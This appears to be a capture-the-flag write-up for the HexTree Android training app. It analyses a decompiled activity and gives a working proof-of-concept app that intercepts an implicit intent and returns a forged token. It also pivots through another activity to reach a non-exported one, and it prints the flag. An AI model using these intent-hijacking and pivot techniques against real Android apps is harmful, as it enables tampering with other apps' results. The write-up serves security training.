0xAnan's Dojo

Graph View

Flag 11 - Responding to an Implicit Intent

3 min read

Static Analysis

AndroidManifest.xml

Upon inspecting the Flag11Activity in the AndroidManifset.xml file we see the following

<activity  
	android:name="io.hextree.attacksurface.activities.Flag11Activity"  
	android:exported="false"/>

Since exported is set to false we can’t call this activity from our exploit apk, but as we saw in Flag5Activity we can use it to be our pivot activity

Flag11Activity Class

public class Flag11Activity extends AppCompactActivity {  
    public Flag11Activity() {  
        this.name = "Flag 11 - Respond to implicit intent";  
        this.tag = "ImplicitIntent";  
        this.flag = "OO4jpSDTSrgJ9c+o3AXXL+awhn5K0bqUYrQwJA870/c=";  
        this.tagColor = R.color.red;  
    }  
  
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity  
    protected void onCreate(Bundle bundle) {  
        super.onCreate(bundle);  
        this.f = new LogHelper(this);  
        if (getIntent().getAction() == null) {  
            Toast.makeText(this, "Sending implicit intent to\nio.hextree.attacksurface.ATTACK_ME", 1).show();  
            Intent intent = new Intent("io.hextree.attacksurface.ATTACK_ME");  
            intent.addFlags(8);  
            try {  
                startActivityForResult(intent, 42);  
            } catch (RuntimeException e) {  
                e.printStackTrace();  
                Toast.makeText(this, "No app found to handle the intent\nio.hextree.attacksurface.ATTACK_ME", 1).show();  
                finish();  
            }  
        }  
    }  
  
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, android.app.Activity  
    protected void onActivityResult(int i, int i2, Intent intent) {  
        if (intent != null && intent.getIntExtra("token", -1) == 1094795585) {  
            this.f.addTag(1094795585);  
            success(this);  
        }  
        super.onActivityResult(i, i2, intent);  
    }  
}

Upon reviewing the code we see that when this class is called it sends an implicit intent to with io.hextree.attacksurface.ATTACK_ME action and this intent is started with startActivityForResult so it expects some results, in the onActivityResult function it expects the result coming from us to have an int extra called token with the value of 1094795585 let’s create the POC for it

Creating POC

AndroidManifest.xml

The first thing we want to do is the set the exported option to true so other apps can call this activity Secondly we need to make this acitivity a default reciever for the io.hextree.attacksurface.ATTACK_ME action so when the target fires an implicit intent with this action it goes to our activity

<activity
	android:name=".Flag11"
	android:exported="true">
	<intent-filter>
		<action android:name="io.hextree.attacksurface.ATTACK_ME" />
 
		<category android:name="android.intent.category.DEFAULT" />
	</intent-filter>
</activity>

Flag11.java

Now we create an activity that recieves the intent and prints the extra called flag We also used the pivot utility that uses Flag5Activity as a pivot so we can call Flag10Activity as it’s not exported so we can’t call it directly

public class Flag11 extends AppCompatActivity {
 
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
 
        ///////////////////////////////////////////
        // If It Was Called From Outside The APK //
        ///////////////////////////////////////////
        if (getCallingActivity() != null) {
            Log.v("Flag11 - Debug", "Flag11 started for a result by: " + getCallingActivity().flattenToString());
            // -------- Sending the needed data to get the flag -------- //
            Intent result = new Intent();
            result.putExtra("token", 1094795585);
            // -------- Returning the result to the calling activity -------- //
            setResult(RESULT_OK, result);
            finish(); // Immediately finish and return the result.
            return;
        }
        ////////////////////////////////////////////
        // If We Opened The Activity From Our APK //
        ////////////////////////////////////////////
        setContentView(R.layout.activity_flag11);
        getSupportActionBar().setTitle("Flag 11");
 
        Button button = findViewById(R.id.button_flag11);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Log.v("Flag11 - Debug", "Attempting to get the flag");
                // 1. Create the final destination intent
                Intent targetIntent = new Intent();
                targetIntent.setComponent(new ComponentName("io.hextree.attacksurface",
                        "io.hextree.attacksurface.activities.Flag11Activity"));
                // 2. Use the PivotIntent utility to create the wrapped intent
                Intent pivot = PivotIntent.create(targetIntent);
                // 3. Start the activity to get the flag back
                startActivity(pivot);
            }
        });
    }
}

Flag

HXT{sent-back-result-1897djh}